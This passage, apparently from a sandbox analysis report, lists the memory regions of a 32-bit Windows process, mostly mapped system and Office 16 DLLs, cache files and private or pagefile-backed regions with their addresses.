"c:\\windows\\syswow64\\propsys.dll") Region: id = 549 start_va = 0x6fdb0000 end_va = 0x6fde2fff monitored = 0 entry_point = 0x6fdc0e70 region_type = mapped_file name = "mlang.dll" filename = "\\Windows\\SysWOW64\\mlang.dll" (normalized: "c:\\windows\\syswow64\\mlang.dll") Region: id = 550 start_va = 0x6fdf0000 end_va = 0x6fdf9fff monitored = 0 entry_point = 0x6fdf3200 region_type = mapped_file name = "secur32.dll" filename = "\\Windows\\SysWOW64\\secur32.dll" (normalized: "c:\\windows\\syswow64\\secur32.dll") Region: id = 551 start_va = 0x6ff10000 end_va = 0x70127fff monitored = 0 entry_point = 0x6ffb97b0 region_type = mapped_file name = "d3d10warp.dll" filename = "\\Windows\\SysWOW64\\d3d10warp.dll" (normalized: "c:\\windows\\syswow64\\d3d10warp.dll") Region: id = 552 start_va = 0x70130000 end_va = 0x7019ffff monitored = 0 entry_point = 0x70169e70 region_type = mapped_file name = "directmanipulation.dll" filename = "\\Windows\\SysWOW64\\directmanipulation.dll" (normalized: "c:\\windows\\syswow64\\directmanipulation.dll") Region: id = 553 start_va = 0x70660000 end_va = 0x7072cfff monitored = 0 entry_point = 0x706b29c0 region_type = mapped_file name = "twinapi.appcore.dll" filename = "\\Windows\\SysWOW64\\twinapi.appcore.dll" (normalized: "c:\\windows\\syswow64\\twinapi.appcore.dll") Region: id = 554 start_va = 0x70730000 end_va = 0x707d6fff monitored = 0 entry_point = 0x70766240 region_type = mapped_file name = "dcomp.dll" filename = "\\Windows\\SysWOW64\\dcomp.dll" (normalized: "c:\\windows\\syswow64\\dcomp.dll") Region: id = 555 start_va = 0x707e0000 end_va = 0x709f9fff monitored = 0 entry_point = 0x70875550 region_type = mapped_file name = "d3d11.dll" filename = "\\Windows\\SysWOW64\\d3d11.dll" (normalized: "c:\\windows\\syswow64\\d3d11.dll") Region: id = 556 start_va = 0x70a00000 end_va = 0x70a40fff monitored = 0 entry_point = 0x70a07fe0 region_type = mapped_file name = "dataexchange.dll" filename = "\\Windows\\SysWOW64\\DataExchange.dll" (normalized: "c:\\windows\\syswow64\\dataexchange.dll") Region: id = 557 start_va = 0x70ae0000 end_va = 0x70b62fff monitored = 0 entry_point = 0x70b037c0 region_type = mapped_file name = "dxgi.dll" filename = "\\Windows\\SysWOW64\\dxgi.dll" (normalized: "c:\\windows\\syswow64\\dxgi.dll") Region: id = 558 start_va = 0x70b70000 end_va = 0x70d60fff monitored = 0 entry_point = 0x70c53cd0 region_type = mapped_file name = "dwrite.dll" filename = "\\Windows\\SysWOW64\\DWrite.dll" (normalized: "c:\\windows\\syswow64\\dwrite.dll") Region: id = 559 start_va = 0x70d70000 end_va = 0x711fdfff monitored = 0 entry_point = 0x710fa320 region_type = mapped_file name = "d2d1.dll" filename = "\\Windows\\SysWOW64\\d2d1.dll" (normalized: "c:\\windows\\syswow64\\d2d1.dll") Region: id = 560 start_va = 0x71540000 end_va = 0x7155afff monitored = 0 entry_point = 0x71549050 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\SysWOW64\\bcrypt.dll" (normalized: "c:\\windows\\syswow64\\bcrypt.dll") Region: id = 561 start_va = 0x72c90000 end_va = 0x72cbbfff monitored = 0 entry_point = 0x72ca5ee0 region_type = mapped_file name = "fwbase.dll" filename = "\\Windows\\SysWOW64\\fwbase.dll" (normalized: "c:\\windows\\syswow64\\fwbase.dll") Region: id = 562 start_va = 0x72cc0000 end_va = 0x72ccafff monitored = 0 entry_point = 0x72cc1d20 region_type = mapped_file name = "davhlpr.dll" filename = "\\Windows\\SysWOW64\\davhlpr.dll" (normalized: "c:\\windows\\syswow64\\davhlpr.dll") Region: id = 563 start_va = 0x72d30000 end_va = 0x72f3efff monitored = 0 entry_point = 0x72ddb0a0 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\WinSxS\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10586.0_none_d3c2e4e965da4528\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10586.0_none_d3c2e4e965da4528\\comctl32.dll") Region: id = 564 start_va = 0x73db0000 end_va = 0x73dccfff monitored = 0 entry_point = 0x73db3b10 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\SysWOW64\\dwmapi.dll" (normalized: "c:\\windows\\syswow64\\dwmapi.dll") Region: id = 565 start_va = 0x73dd0000 end_va = 0x73e44fff monitored = 0 entry_point = 0x73e09a60 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\SysWOW64\\uxtheme.dll" (normalized: "c:\\windows\\syswow64\\uxtheme.dll") Region: id = 566 start_va = 0x73e50000 end_va = 0x73ee1fff monitored = 0 entry_point = 0x73e90380 region_type = mapped_file name = "apphelp.dll" filename = "\\Windows\\SysWOW64\\apphelp.dll" (normalized: "c:\\windows\\syswow64\\apphelp.dll") Region: id = 567 start_va = 0x73ef0000 end_va = 0x73ef9fff monitored = 0 entry_point = 0x73ef2a00 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 568 start_va = 0x73f00000 end_va = 0x73f1dfff monitored = 0 entry_point = 0x73f0b640 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 569 start_va = 0x73f20000 end_va = 0x73f2efff monitored = 0 entry_point = 0x73f22e40 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\SysWOW64\\profapi.dll" (normalized: "c:\\windows\\syswow64\\profapi.dll") Region: id = 570 start_va = 0x73f30000 end_va = 0x73f8efff monitored = 0 entry_point = 0x73f34af0 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\SysWOW64\\ws2_32.dll" (normalized: "c:\\windows\\syswow64\\ws2_32.dll") Region: id = 571 start_va = 0x741b0000 end_va = 0x741dafff monitored = 0 entry_point = 0x741b5680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 572 start_va = 0x741e0000 end_va = 0x742d1fff monitored = 0 entry_point = 0x74218070 region_type = mapped_file name = "comdlg32.dll" filename = "\\Windows\\SysWOW64\\comdlg32.dll" (normalized: "c:\\windows\\syswow64\\comdlg32.dll") Region: id = 573 start_va = 0x74340000 end_va = 0x743c3fff monitored = 0 entry_point = 0x74366220 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\SysWOW64\\clbcatq.dll" (normalized: "c:\\windows\\syswow64\\clbcatq.dll") Region: id = 574 start_va = 0x743d0000 end_va = 0x74516fff monitored = 0 entry_point = 0x743e1cf0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 575 start_va = 0x74520000 end_va = 0x745acfff monitored = 0 entry_point = 0x74569b90 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\SysWOW64\\SHCore.dll" (normalized: "c:\\windows\\syswow64\\shcore.dll") Region: id = 576 start_va = 0x745b0000 end_va = 0x74aa8fff monitored = 0 entry_point = 0x747b7610 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\SysWOW64\\windows.storage.dll" (normalized: "c:\\windows\\syswow64\\windows.storage.dll") Region: id = 577 start_va = 0x74ab0000 end_va = 0x74bfefff monitored = 0 entry_point = 0x74b66820 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 578 start_va = 0x74dc0000 end_va = 0x74eaafff monitored = 0 entry_point = 0x74dfd650 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 579 start_va = 0x74eb0000 end_va = 0x762aefff monitored = 0 entry_point = 0x7506b990 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\SysWOW64\\shell32.dll" (normalized: "c:\\windows\\syswow64\\shell32.dll") Region: id = 580 start_va = 0x762b0000 end_va = 0x7646cfff monitored = 0 entry_point = 0x76392a10 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 581 start_va = 0x76470000 end_va = 0x764b3fff monitored = 0 entry_point = 0x76477410 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\SysWOW64\\powrprof.dll" (normalized: "c:\\windows\\syswow64\\powrprof.dll") Region: id = 582 start_va = 0x764e0000 end_va = 0x765fefff monitored = 0 entry_point = 0x76525980 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 583 start_va = 0x76600000 end_va = 0x7667afff monitored = 0 entry_point = 0x7661e970 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 584 start_va = 0x76680000 end_va = 0x76711fff monitored = 0 entry_point = 0x766b8cf0 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll") Region: id = 585 start_va = 0x76720000 end_va = 0x767fffff monitored = 0 entry_point = 0x76733980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 586 start_va = 0x76800000 end_va = 0x76836fff monitored = 0 entry_point = 0x76803b50 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\SysWOW64\\cfgmgr32.dll" (normalized: "c:\\windows\\syswow64\\cfgmgr32.dll") Region: id = 587 start_va = 0x76840000 end_va = 0x76897fff monitored = 0 entry_point = 0x768825c0 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 588 start_va = 0x76910000 end_va = 0x76a8dfff monitored = 0 entry_point = 0x769c1b90 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 589 start_va = 0x76a90000 end_va = 0x76b4dfff monitored = 0 entry_point = 0x76ac5630 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 590 start_va = 0x76b50000 end_va = 0x76b54fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "normaliz.dll" filename = "\\Windows\\SysWOW64\\normaliz.dll" (normalized: "c:\\windows\\syswow64\\normaliz.dll") Region: id = 591 start_va = 0x76b60000 end_va = 0x76bbdfff monitored = 0 entry_point = 0x76b77470 region_type = mapped_file name = "firewallapi.dll" filename = "\\Windows\\SysWOW64\\FirewallAPI.dll" (normalized: "c:\\windows\\syswow64\\firewallapi.dll") Region: id = 592 start_va = 0x76be0000 end_va = 0x76bf2fff monitored = 0 entry_point = 0x76be1d20 region_type = mapped_file name = "netapi32.dll" filename = "\\Windows\\SysWOW64\\netapi32.dll" (normalized: "c:\\windows\\syswow64\\netapi32.dll") Region: id = 593 start_va = 0x76c00000 end_va = 0x76cacfff monitored = 0 entry_point = 0x76c14f00 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 594 start_va = 0x76cb0000 end_va = 0x76cf3fff monitored = 0 entry_point = 0x76cc9d80 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 595 start_va = 0x76d00000 end_va = 0x76d44fff monitored = 0 entry_point = 0x76d1de90 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 596 start_va = 0x76d50000 end_va = 0x76d5bfff monitored = 0 entry_point = 0x76d53930 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\SysWOW64\\kernel.appcore.dll" (normalized: "c:\\windows\\syswow64\\kernel.appcore.dll") Region: id = 597 start_va = 0x77170000 end_va = 0x771c9fff monitored = 0 entry_point = 0x77197e70 region_type = mapped_file name = "coml2.dll" filename = "\\Windows\\SysWOW64\\coml2.dll" (normalized: "c:\\windows\\syswow64\\coml2.dll") Region: id = 598 start_va = 0x771d0000 end_va = 0x7734afff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 599 start_va = 0x7fe90000 end_va = 0x7fe9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fe90000" filename = "" Region: id = 600 start_va = 0x7fea0000 end_va = 0x7feaffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fea0000" filename = "" Region: id = 601 start_va = 0x7feb0000 end_va = 0x7ffaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 602 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 603 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 604 start_va = 0x7fff0000 end_va = 0x7ffa1676ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 605 start_va = 0x7ffa16770000 end_va = 0x7ffa16930fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 606 start_va = 0x7ffa16931000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffa16931000" filename = "" Region: id = 607 start_va = 0x12a10000 end_va = 0x12b0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000012a10000" filename = "" Region: id = 608 start_va = 0x6a670000 end_va = 0x6a67efff monitored = 0 entry_point = 0x6a673f00 region_type = mapped_file name = "cscapi.dll" filename = "\\Windows\\SysWOW64\\cscapi.dll" (normalized: "c:\\windows\\syswow64\\cscapi.dll") Region: id = 609 start_va = 0x6a660000 end_va = 0x6a669fff monitored = 0 entry_point = 0x6a6628d0 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\SysWOW64\\netutils.dll" (normalized: "c:\\windows\\syswow64\\netutils.dll") Region: id = 610 start_va = 0x11f70000 end_va = 0x11f70fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000011f70000" filename = "" Region: id = 611 start_va = 0x12790000 end_va = 0x127cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000012790000" filename = "" Region: id = 612 start_va = 0x127d0000 end_va = 0x128cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000127d0000" filename = "" Region: id = 613 start_va = 0x11f70000 end_va = 0x11f71fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "iconcache_idx.db" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Explorer\\iconcache_idx.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\explorer\\iconcache_idx.db") Region: id = 614 start_va = 0x11f80000 end_va = 0x11f80fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "iconcache_16.db" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Explorer\\iconcache_16.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\explorer\\iconcache_16.db") Region: id = 615 start_va = 0x6a590000 end_va = 0x6a658fff monitored = 0 entry_point = 0x6a5a3180 region_type = mapped_file name = "ntshrui.dll" filename = "\\Windows\\SysWOW64\\ntshrui.dll" (normalized: "c:\\windows\\syswow64\\ntshrui.dll") Region: id = 616 start_va = 0x6a570000 end_va = 0x6a58bfff monitored = 0 entry_point = 0x6a574720 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\SysWOW64\\srvcli.dll" (normalized: "c:\\windows\\syswow64\\srvcli.dll") Region: id = 617 start_va = 0x12790000 end_va = 0x12795fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "oregres.dll" filename = "\\Program Files (x86)\\Common Files\\Microsoft Shared\\OFFICE16\\oregres.dll" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\office16\\oregres.dll") Region: id = 618 start_va = 0x127a0000 end_va = 0x127a3fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "oregres.dll.mui" filename = "\\Program Files (x86)\\Common Files\\Microsoft Shared\\OFFICE16\\en-us\\oregres.dll.mui" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\office16\\en-us\\oregres.dll.mui") Region: id = 619 start_va = 0x12790000 end_va = 0x12793fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 620 start_va = 0x127a0000 end_va = 0x127a0fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{376d4583-7d39-4b0c-a26b-8169803ad7c6}.2.ver0x0000000000000002.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{376D4583-7D39-4B0C-A26B-8169803AD7C6}.2.ver0x0000000000000002.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{376d4583-7d39-4b0c-a26b-8169803ad7c6}.2.ver0x0000000000000002.db") Region: id = 621 start_va = 0x127b0000 end_va = 0x127b3fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 622 start_va = 0x127c0000 end_va = 0x127c0fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{28c2908a-a261-4be8-aaa2-4843375011c5}.2.ver0x0000000000000001.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{28C2908A-A261-4BE8-AAA2-4843375011C5}.2.ver0x0000000000000001.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{28c2908a-a261-4be8-aaa2-4843375011c5}.2.ver0x0000000000000001.db") Region: id = 623 start_va = 0x127d0000 end_va = 0x1280ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000127d0000" filename = "" Region: id = 624 start_va = 0x12810000 end_va = 0x12810fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000012810000" filename = "" Region: id = 625 start_va = 0x12820000 end_va = 0x12826fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000012820000" filename = "" Region: id = 626 start_va = 0x12830000 end_va = 0x12848fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000012830000" filename = "" Region: id = 627 start_va = 0x12850000 end_va = 0x1288ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000012850000" filename = "" Region: id = 628 start_va = 0x12b10000 end_va = 0x12c0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000012b10000" filename = "" Region: id = 629 start_va = 0x12de0000 end_va = 0x12edffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000012de0000" filename = "" Region: id = 630 start_va = 0x6a3f0000 end_va = 0x6a562fff monitored = 0 entry_point = 0x6a3f1000 region_type = mapped_file name = "grooveex.dll" filename = "\\PROGRA~2\\MICROS~1\\Office16\\GROOVEEX.DLL" (normalized: "c:\\program files (x86)\\micros~1\\office16\\grooveex.dll") Region: id = 631 start_va = 0x12890000 end_va = 0x12890fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000012890000" filename = "" Region: id = 632 start_va = 0x12890000 end_va = 0x12891fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "iconcache_idx.db" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Explorer\\iconcache_idx.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\explorer\\iconcache_idx.db") Region: id = 633 start_va = 0x128a0000 end_va = 0x128a0fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "iconcache_16.db" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Explorer\\iconcache_16.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\explorer\\iconcache_16.db") Region: id = 634 start_va = 0x128b0000 end_va = 0x128b0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "imageres.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\imageres.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\imageres.dll.mui") Region: id = 635 start_va = 0x128c0000 end_va = 0x128c0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000128c0000" filename = "" Region: id = 636 start_va = 0x154f0000 end_va = 0x1810ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "imageres.dll" filename = "\\Windows\\SysWOW64\\imageres.dll" (normalized: "c:\\windows\\syswow64\\imageres.dll") Region: id = 637 start_va = 0x128b0000 end_va = 0x128b1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000128b0000" filename = "" Region: id = 638 start_va = 0x12c10000 end_va = 0x12c10fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000012c10000" filename = "" Region: id = 639 start_va = 0x154f0000 end_va = 0x1810ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "imageres.dll" filename = "\\Windows\\SysWOW64\\imageres.dll" (normalized: "c:\\windows\\syswow64\\imageres.dll") Region: id = 640 start_va = 0x154f0000 end_va = 0x15613fff monitored = 0 entry_point = 0x154f4920 region_type = mapped_file name = "networkexplorer.dll" filename = "\\Windows\\SysWOW64\\networkexplorer.dll" (normalized: "c:\\windows\\syswow64\\networkexplorer.dll") Region: id = 641 start_va = 0x128c0000 end_va = 0x128c1fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "networkexplorer.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\NetworkExplorer.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\networkexplorer.dll.mui") Region: id = 642 start_va = 0x154f0000 end_va = 0x156a8fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "office.odf" filename = "\\Program Files (x86)\\Common Files\\Microsoft Shared\\OFFICE16\\Cultures\\OFFICE.ODF" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\office16\\cultures\\office.odf") Region: id = 643 start_va = 0x6a380000 end_va = 0x6a3effff monitored = 0 entry_point = 0x6a3ad4e0 region_type = mapped_file name = "dlnashext.dll" filename = "\\Windows\\SysWOW64\\dlnashext.dll" (normalized: "c:\\windows\\syswow64\\dlnashext.dll") Region: id = 644 start_va = 0x6a250000 end_va = 0x6a373fff monitored = 0 entry_point = 0x6a254920 region_type = mapped_file name = "networkexplorer.dll" filename = "\\Windows\\SysWOW64\\networkexplorer.dll" (normalized: "c:\\windows\\syswow64\\networkexplorer.dll") Region: id = 645 start_va = 0x128c0000 end_va = 0x128c0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000128c0000" filename = "" Region: id = 646 start_va = 0x128c0000 end_va = 0x128c7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000128c0000" filename = "" Region: id = 647 start_va = 0x6a1f0000 end_va = 0x6a246fff monitored = 0 entry_point = 0x6a237e90 region_type = mapped_file name = "playtodevice.dll" filename = "\\Windows\\SysWOW64\\PlayToDevice.dll" (normalized: "c:\\windows\\syswow64\\playtodevice.dll") Region: id = 648 start_va = 0x12810000 end_va = 0x1284ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000012810000" filename = "" Region: id = 649 start_va = 0x12c10000 end_va = 0x12c28fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000012c10000" filename = "" Region: id = 650 start_va = 0x12c30000 end_va = 0x12c48fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000012c30000" filename = "" Region: id = 651 start_va = 0x12c50000 end_va = 0x12c68fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000012c50000" filename = "" Region: id = 652 start_va = 0x156b0000 end_va = 0x157affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000156b0000" filename = "" Region: id = 653 start_va = 0x157b0000 end_va = 0x1602dfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "grooveintlresource.dll" filename = "\\PROGRA~2\\MICROS~1\\Office16\\1033\\GrooveIntlResource.dll" (normalized: "c:\\program files (x86)\\micros~1\\office16\\1033\\grooveintlresource.dll") Region: id = 654 start_va = 0x16030000 end_va = 0x16122fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "shellstyle.dll" filename = "\\Windows\\Resources\\Themes\\aero\\Shell\\NormalColor\\shellstyle.dll" (normalized: "c:\\windows\\resources\\themes\\aero\\shell\\normalcolor\\shellstyle.dll") Region: id = 655 start_va = 0x6a1d0000 end_va = 0x6a1eafff monitored = 0 entry_point = 0x6a1e36d0 region_type = mapped_file name = "devdispitemprovider.dll" filename = "\\Windows\\SysWOW64\\DevDispItemProvider.dll" (normalized: "c:\\windows\\syswow64\\devdispitemprovider.dll") Region: id = 656 start_va = 0x16030000 end_va = 0x16122fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "shellstyle.dll" filename = "\\Windows\\Resources\\Themes\\aero\\Shell\\NormalColor\\shellstyle.dll" (normalized: "c:\\windows\\resources\\themes\\aero\\shell\\normalcolor\\shellstyle.dll") Region: id = 657 start_va = 0x6a140000 end_va = 0x6a161fff monitored = 0 entry_point = 0x6a1491f0 region_type = mapped_file name = "devobj.dll" filename = "\\Windows\\SysWOW64\\devobj.dll" (normalized: "c:\\windows\\syswow64\\devobj.dll") Region: id = 658 start_va = 0x6a170000 end_va = 0x6a1c4fff monitored = 0 entry_point = 0x6a192ee0 region_type = mapped_file name = "mmdevapi.dll" filename = "\\Windows\\SysWOW64\\MMDevAPI.dll" (normalized: "c:\\windows\\syswow64\\mmdevapi.dll") Region: id = 659 start_va = 0x69f50000 end_va = 0x6a137fff monitored = 0 entry_point = 0x69fd04c0 region_type = mapped_file name = "wpdshext.dll" filename = "\\Windows\\SysWOW64\\wpdshext.dll" (normalized: "c:\\windows\\syswow64\\wpdshext.dll") Region: id = 660 start_va = 0xb160000 end_va = 0xb161fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000b160000" filename = "" Region: id = 661 start_va = 0xb170000 end_va = 0xb17ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000b170000" filename = "" Region: id = 662 start_va = 0xb170000 end_va = 0xb171fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "iconcache_idx.db" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Explorer\\iconcache_idx.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\explorer\\iconcache_idx.db") Region: id = 663 start_va = 0xb180000 end_va = 0xb180fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "iconcache_16.db" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Explorer\\iconcache_16.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\explorer\\iconcache_16.db") Region: id = 664 start_va = 0xb190000 end_va = 0xb190fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "imageres.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\imageres.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\imageres.dll.mui") Region: id = 665 start_va = 0x16030000 end_va = 0x18c4ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "imageres.dll" filename = "\\Windows\\SysWOW64\\imageres.dll" (normalized: "c:\\windows\\syswow64\\imageres.dll") Region: id = 666 start_va = 0x69ec0000 end_va = 0x69f42fff monitored = 0 entry_point = 0x69ed1fa0 region_type = mapped_file name = "portabledeviceapi.dll" filename = "\\Windows\\SysWOW64\\PortableDeviceApi.dll" (normalized: "c:\\windows\\syswow64\\portabledeviceapi.dll") Region: id = 667 start_va = 0x76d60000 end_va = 0x7716afff monitored = 0 entry_point = 0x76d8adf0 region_type = mapped_file name = "setupapi.dll" filename = "\\Windows\\SysWOW64\\setupapi.dll" (normalized: "c:\\windows\\syswow64\\setupapi.dll") Region: id = 668 start_va = 0x74c00000 end_va = 0x74c41fff monitored = 0 entry_point = 0x74c16f10 region_type = mapped_file name = "wintrust.dll" filename = "\\Windows\\SysWOW64\\wintrust.dll" (normalized: "c:\\windows\\syswow64\\wintrust.dll") Region: id = 669 start_va = 0x764c0000 end_va = 0x764cdfff monitored = 0 entry_point = 0x764c5410 region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\SysWOW64\\msasn1.dll" 